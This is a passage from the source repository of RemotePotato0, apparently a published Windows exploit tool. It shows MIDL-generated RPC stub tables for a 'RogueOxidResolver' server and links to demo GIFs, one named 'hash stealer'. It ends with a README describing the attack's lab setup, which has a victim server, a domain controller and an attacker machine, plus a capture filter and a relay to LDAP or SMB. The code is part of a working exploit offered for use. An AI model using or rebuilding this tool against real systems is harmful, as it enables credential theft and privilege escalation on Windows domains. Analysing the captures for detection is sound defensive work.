1884 | 0, 1885 | 0, 1886 | 0, 1887 | 0 1888 | }, 1889 | (NDR64_UINT8) 0 /* 0x0 */, 1890 | (NDR64_UINT32) 4 /* 0x4 */, 1891 | &__midl_frag12 1892 | } 1893 | }; 1894 | 1895 | static const __midl_frag2_t __midl_frag2 = 1896 | { 1897 | /* ResolveOxid */ 1898 | { 1899 | /* ResolveOxid */ /* procedure ResolveOxid */ 1900 | (NDR64_UINT32) 23986240 /* 0x16e0040 */, /* explicit handle */ /* IsIntrepreted, ServerMustSize, ClientMustSize, HasReturn, ServerCorrelation, ClientCorrelation, HasExtensions */ 1901 | (NDR64_UINT32) 64 /* 0x40 */ , /* Stack size */ 1902 | (NDR64_UINT32) 46 /* 0x2e */, 1903 | (NDR64_UINT32) 112 /* 0x70 */, 1904 | (NDR64_UINT16) 1 /* 0x1 */, 1905 | (NDR64_UINT16) 0 /* 0x0 */, 1906 | (NDR64_UINT16) 7 /* 0x7 */, 1907 | (NDR64_UINT16) 8 /* 0x8 */ 1908 | }, 1909 | { 1910 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1911 | { 1912 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1913 | 0x72, /* FC64_BIND_PRIMITIVE */ 1914 | (NDR64_UINT8) 0 /* 0x0 */, 1915 | 0 /* 0x0 */, /* Stack offset */ 1916 | (NDR64_UINT8) 0 /* 0x0 */, 1917 | (NDR64_UINT8) 0 /* 0x0 */ 1918 | }, 1919 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 1920 | }, 1921 | { 1922 | /* pOxid */ /* parameter pOxid */ 1923 | &__midl_frag45, 1924 | { 1925 | /* pOxid */ 1926 | 0, 1927 | 0, 1928 | 0, 1929 | 1, 1930 | 0, 1931 | 0, 1932 | 1, 1933 | 0, 1934 | 1, 1935 | 0, 1936 | 0, 1937 | 0, 1938 | 0, 1939 | (NDR64_UINT16) 0 /* 0x0 */, 1940 | 0 1941 | }, /* [in], Basetype, SimpleRef */ 1942 | (NDR64_UINT16) 0 /* 0x0 */, 1943 | 8 /* 0x8 */, /* Stack offset */ 1944 | }, 1945 | { 1946 | /* cRequestedProtseqs */ /* parameter cRequestedProtseqs */ 1947 | &__midl_frag49, 1948 | { 1949 | /* cRequestedProtseqs */ 1950 | 0, 1951 | 0, 1952 | 0, 1953 | 1, 1954 | 0, 1955 | 0, 1956 | 1, 1957 | 1, 1958 | 0, 1959 | 0, 1960 | 0, 1961 | 0, 1962 | 0, 1963 | (NDR64_UINT16) 0 /* 0x0 */, 1964 | 0 1965 | }, /* [in], Basetype, ByValue */ 1966 | (NDR64_UINT16) 0 /* 0x0 */, 1967 | 16 /* 0x10 */, /* Stack offset */ 1968 | }, 1969 | { 1970 | /* arRequestedProtseqs */ /* parameter arRequestedProtseqs */ 1971 | &__midl_frag47, 1972 | { 1973 | /* arRequestedProtseqs */ 1974 | 1, 1975 | 1, 1976 | 0, 1977 | 1, 1978 | 0, 1979 | 0, 1980 | 0, 1981 | 0, 1982 | 0, 1983 | 0, 1984 | 0, 1985 | 0, 1986 | 0, 1987 | (NDR64_UINT16) 0 /* 0x0 */, 1988 | 0 1989 | }, /* MustSize, MustFree, [in] */ 1990 | (NDR64_UINT16) 0 /* 0x0 */, 1991 | 24 /* 0x18 */, /* Stack offset */ 1992 | }, 1993 | { 1994 | /* ppdsaOxidBindings */ /* parameter ppdsaOxidBindings */ 1995 | &__midl_frag60, 1996 | { 1997 | /* ppdsaOxidBindings */ 1998 | 1, 1999 | 1, 2000 | 0, 2001 | 0, 2002 | 1, 2003 | 0, 2004 | 0, 2005 | 0, 2006 | 0, 2007 | 0, 2008 | 0, 2009 | 0, 2010 | 0, 2011 | (NDR64_UINT16) 0 /* 0x0 */, 2012 | 1 2013 | }, /* MustSize, MustFree, [out], UseCache */ 2014 | (NDR64_UINT16) 0 /* 0x0 */, 2015 | 32 /* 0x20 */, /* Stack offset */ 2016 | }, 2017 | { 2018 | /* pipidRemUnknown */ /* parameter pipidRemUnknown */ 2019 | &__midl_frag16, 2020 | { 2021 | /* pipidRemUnknown */ 2022 | 0, 2023 | 1, 2024 | 0, 2025 | 0, 2026 | 1, 2027 | 0, 2028 | 0, 2029 | 0, 2030 | 1, 2031 | 0, 2032 | 0, 2033 | 0, 2034 | 0, 2035 | (NDR64_UINT16) 0 /* 0x0 */, 2036 | 1 2037 | }, /* MustFree, [out], SimpleRef, UseCache */ 2038 | (NDR64_UINT16) 0 /* 0x0 */, 2039 | 40 /* 0x28 */, /* Stack offset */ 2040 | }, 2041 | { 2042 | /* pAuthnHint */ /* parameter pAuthnHint */ 2043 | &__midl_frag63, 2044 | { 2045 | /* pAuthnHint */ 2046 | 0, 2047 | 0, 2048 | 0, 2049 | 0, 2050 | 1, 2051 | 0, 2052 | 1, 2053 | 0, 2054 | 1, 2055 | 0, 2056 | 0, 2057 | 0, 2058 | 0, 2059 | (NDR64_UINT16) 0 /* 0x0 */, 2060 | 1 2061 | }, /* [out], Basetype, SimpleRef, UseCache */ 2062 | (NDR64_UINT16) 0 /* 0x0 */, 2063 | 48 /* 0x30 */, /* Stack offset */ 2064 | }, 2065 | { 2066 | /* error_status_t */ /* parameter error_status_t */ 2067 | &__midl_frag64, 2068 | { 2069 | /* error_status_t */ 2070 | 0, 2071 | 0, 2072 | 0, 2073 | 0, 2074 | 1, 2075 | 1, 2076 | 1, 2077 | 1, 2078 | 0, 2079 | 0, 2080 | 0, 2081 | 0, 2082 | 0, 2083 | (NDR64_UINT16) 0 /* 0x0 */, 2084 | 0 2085 | }, /* [out], IsReturn, Basetype, ByValue */ 2086 | (NDR64_UINT16) 0 /* 0x0 */, 2087 | 56 /* 0x38 */, /* Stack offset */ 2088 | } 2089 | }; 2090 | 2091 | static const __midl_frag1_t __midl_frag1 = 2092 | (NDR64_UINT32) 0 /* 0x0 */; 2093 | 2094 | 2095 | #include "poppack.h" 2096 | 2097 | 2098 | static const FormatInfoRef IObjectExporter_Ndr64ProcTable[] = 2099 | { 2100 | &__midl_frag2, 2101 | &__midl_frag20, 2102 | &__midl_frag24, 2103 | &__midl_frag41, 2104 | &__midl_frag43, 2105 | &__midl_frag58 2106 | }; 2107 | 2108 | 2109 | static const MIDL_STUB_DESC IObjectExporter_StubDesc = 2110 | { 2111 | (void *)& IObjectExporter___RpcServerInterface, 2112 | MIDL_user_allocate, 2113 | MIDL_user_free, 2114 | 0, 2115 | 0, 2116 | 0, 2117 | 0, 2118 | 0, 2119 | RogueOxidResolver__MIDL_TypeFormatString.Format, 2120 | 1, /* -error bounds_check flag */ 2121 | 0x60001, /* Ndr library version */ 2122 | 0, 2123 | 0x801026e, /* MIDL Version 8.1.622 */ 2124 | 0, 2125 | 0, 2126 | 0, /* notify & notify_flag routine table */ 2127 | 0x2000001, /* MIDL flag */ 2128 | 0, /* cs routines */ 2129 | (void *)& IObjectExporter_ServerInfo, /* proxy/server info */ 2130 | 0 2131 | }; 2132 | 2133 | static const RPC_DISPATCH_FUNCTION IObjectExporter_NDR64__table[] = 2134 | { 2135 | NdrServerCallAll, 2136 | NdrServerCallAll, 2137 | NdrServerCallAll, 2138 | NdrServerCallAll, 2139 | NdrServerCallAll, 2140 | NdrServerCallAll, 2141 | 0 2142 | }; 2143 | static const RPC_DISPATCH_TABLE IObjectExporter_NDR64__v0_0_DispatchTable = 2144 | { 2145 | 6, 2146 | (RPC_DISPATCH_FUNCTION*)IObjectExporter_NDR64__table 2147 | }; 2148 | 2149 | static const MIDL_SYNTAX_INFO IObjectExporter_SyntaxInfo [ 2 ] = 2150 | { 2151 | { 2152 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 2153 | (RPC_DISPATCH_TABLE*)&IObjectExporter_v0_0_DispatchTable, 2154 | RogueOxidResolver__MIDL_ProcFormatString.Format, 2155 | IObjectExporter_FormatStringOffsetTable, 2156 | RogueOxidResolver__MIDL_TypeFormatString.Format, 2157 | 0, 2158 | 0, 2159 | 0 2160 | } 2161 | ,{ 2162 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}, 2163 | (RPC_DISPATCH_TABLE*)&IObjectExporter_NDR64__v0_0_DispatchTable, 2164 | 0 , 2165 | (unsigned short *) IObjectExporter_Ndr64ProcTable, 2166 | 0, 2167 | 0, 2168 | 0, 2169 | 0 2170 | } 2171 | }; 2172 | 2173 | 2174 | static const SERVER_ROUTINE IObjectExporter_ServerRoutineTable[] = 2175 | { 2176 | (SERVER_ROUTINE)ResolveOxid, 2177 | (SERVER_ROUTINE)SimplePing, 2178 | (SERVER_ROUTINE)ComplexPing, 2179 | (SERVER_ROUTINE)ServerAlive, 2180 | (SERVER_ROUTINE)ResolveOxid2, 2181 | (SERVER_ROUTINE)ServerAlive2 2182 | }; 2183 | 2184 | static const MIDL_SERVER_INFO IObjectExporter_ServerInfo = 2185 | { 2186 | &IObjectExporter_StubDesc, 2187 | IObjectExporter_ServerRoutineTable, 2188 | RogueOxidResolver__MIDL_ProcFormatString.Format, 2189 | (unsigned short *) IObjectExporter_FormatStringOffsetTable, 2190 | 0, 2191 | (RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax, 2192 | 2, 2193 | (MIDL_SYNTAX_INFO*)IObjectExporter_SyntaxInfo 2194 | }; 2195 | #if _MSC_VER >= 1200 2196 | #pragma warning(pop) 2197 | #endif 2198 | 2199 | 2200 | #endif /* defined(_M_AMD64)*/ 2201 | 2202 | -------------------------------------------------------------------------------- /demo_cross_session.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antonioCoco/RemotePotato0/e7ae9d4e382c17d3f9359988e4462f1aa19329e8/demo_cross_session.gif -------------------------------------------------------------------------------- /demo_hash_stealer.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antonioCoco/RemotePotato0/e7ae9d4e382c17d3f9359988e4462f1aa19329e8/demo_hash_stealer.gif -------------------------------------------------------------------------------- /network_capture_pcap/README.md: -------------------------------------------------------------------------------- 1 | ## Notes 2 | 3 | ### Scenario: 4 | 5 | - victim server: server1 (192.168.83.131) 6 | - domain controller: dc1 (192.168.83.135) 7 | - attacker: kali (192.168.83.130) 8 | 9 | Other notes: 10 | 11 | - the core of this exploit generate traffic on the victim server (victim_server.pcapng); 12 | - all the irrelevant traffic has been filtered out from the full capture using the following filter: 13 | - `(dcerpc or http) and not rpc_netlogon and not tcp.port == 5985 and (ip.addr == 192.168.83.130 or ip.addr == 127.0.0.1)` 14 | - i have added the capture also of the domain controller (domain_controller.pcapng). Consider that the LDAP traffic generated on the targeted domain controller is specific to the attack scenario we have used. Different attack scenario could generate different traffic on the targeted machine, e.g. relay to SMB. 15 | -------------------------------------------------------------------------------- /network_capture_pcap/domain_controller.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antonioCoco/RemotePotato0/e7ae9d4e382c17d3f9359988e4462f1aa19329e8/network_capture_pcap/domain_controller.pcapng -------------------------------------------------------------------------------- /network_capture_pcap/victim_server.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antonioCoco/RemotePotato0/e7ae9d4e382c17d3f9359988e4462f1aa19329e8/network_capture_pcap/victim_server.pcapng --------------------------------------------------------------------------------